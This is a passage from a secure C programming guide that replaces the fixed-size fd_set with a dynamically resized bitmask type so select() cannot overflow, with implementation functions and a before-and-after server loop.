The proper way to deal with this problem is to allocate the array dynamically and ensure that it is resized as necessary before it is modified. Unfortunately, to do this, we need to create a new data type. We define the data type so that its bit array can be cast to an fd_set pointer and passed directly to select( ), which relies on fd_set having the bitmask layout described above:

#include <stdlib.h>

typedef struct {

long int *fds_bits;

size_t fds_size;

} SPC_FD_SET;

With a new data type defined, we can replace FD_SET( ), FD_CLR( ), FD_ISSET( ), and FD_ZERO( ), which are normally implemented as preprocessor macros. Instead, we will implement them as functions because we need to do a little extra work, and it also helps ensure type safety:

void spc_fd_zero(SPC_FD_SET *fdset) {

fdset->fds_bits = 0;

fdset->fds_size = 0;

}

/* Number of descriptors tracked by each array element (assumes 8-bit bytes) */

#define SPC_FD_NBITS (8 * sizeof(long))

void spc_fd_set(int fd, SPC_FD_SET *fdset) {

long *tmp_bits;

size_t old_count, new_count;

if (fd < 0) return;

if ((size_t)fd >= fdset->fds_size) {

/* fds_size counts descriptors (bits), so convert to array elements */

old_count = fdset->fds_size / SPC_FD_NBITS;

new_count = (size_t)fd / SPC_FD_NBITS + 1;

if (!(tmp_bits = (long *)realloc(fdset->fds_bits, new_count * sizeof(long))))

return;

/* realloc( ) does not clear the elements it adds */

while (old_count < new_count) tmp_bits[old_count++] = 0;

fdset->fds_bits = tmp_bits;

fdset->fds_size = new_count * SPC_FD_NBITS;

}

fdset->fds_bits[fd / SPC_FD_NBITS] |= (long)(1UL << (fd % SPC_FD_NBITS));

}

void spc_fd_clr(int fd, SPC_FD_SET *fdset) {

/* A descriptor beyond the current size was never set, so there is nothing to clear */

if (fd < 0 || (size_t)fd >= fdset->fds_size) return;

fdset->fds_bits[fd / SPC_FD_NBITS] &= ~(long)(1UL << (fd % SPC_FD_NBITS));

}

int spc_fd_isset(int fd, SPC_FD_SET *fdset) {

if (fd < 0 || (size_t)fd >= fdset->fds_size) return 0;

return ((fdset->fds_bits[fd / SPC_FD_NBITS] & (long)(1UL << (fd % SPC_FD_NBITS))) != 0);

}

void spc_fd_free(SPC_FD_SET *fdset) {

if (fdset->fds_bits) free(fdset->fds_bits);

}

int spc_fd_setsize(SPC_FD_SET *fdset) {

return fdset->fds_size;

}

Notice that we've added two additional functions, spc_fd_free( ) and spc_fd_setsize( ). Because we are now dynamically allocating the array, there must be some way to free it. The function spc_fd_free( ) will only free the inner contents of the SPC_FD_SET object passed to it, leaving management of the SPC_FD_SET object up to you; you may allocate these objects either statically or dynamically. The other function, spc_fd_setsize( ), is a replacement for the FD_SETSIZE macro that is normally used as the first argument to select( ), indicating the size of the fd_set objects passed as the next three arguments.

Finally, using the new code requires some minor changes to existing code that uses the standard fd_set. Consider the following code example, where the variable client_count is a global variable that represents the number of connected clients, and the variable client_fds is a global variable that is an array of socket descriptors for each connected client:

void main_server_loop(int server_fd) {

int i;

fd_set read_mask;

for (;;) {

FD_ZERO(&read_mask);

FD_SET(server_fd, &read_mask);

for (i = 0; i < client_count; i++) FD_SET(client_fds[i], &read_mask);

select(FD_SETSIZE, &read_mask, 0, 0, 0);

if (FD_ISSET(server_fd, &read_mask)) {

/* Do something with the server_fd such as call accept( ) */

}

for (i = 0; i < client_count; i++)

if (FD_ISSET(client_fds[i], &read_mask)) {

/* Read some data from the client's socket descriptor */

}

}

}

The equivalent code using the SPC_FD_SET data type and the functions that operate on it would be:

void main_server_loop(int server_fd) {

int i;

SPC_FD_SET read_mask;

for (;;) {

spc_fd_zero(&read_mask);

spc_fd_set(server_fd, &read_mask);

for (i = 0; i < client_count; i++) spc_fd_set(client_fds[i], &read_mask);

select(spc_fd_setsize(&read_mask), (fd_set *)read_mask.fds_bits, 0, 0, 0);

if (spc_fd_isset(server_fd, &read_mask)) {

/* Do something with the server_fd such as call accept( ) */

}

for (i = 0; i < client_count; i++)

if (spc_fd_isset(client_fds[i], &read_mask)) {

/* Read some data from the client's socket descriptor */

}

spc_fd_free(&read_mask);

}

}

As you can see, the code that uses SPC_FD_SET is not all that different from the code that uses fd_set. Naming issues aside, the only real differences are the need to cast the bit array held in the SPC_FD_SET object to an fd_set pointer, and to call spc_fd_free( ).

See Also

Recipe 3.3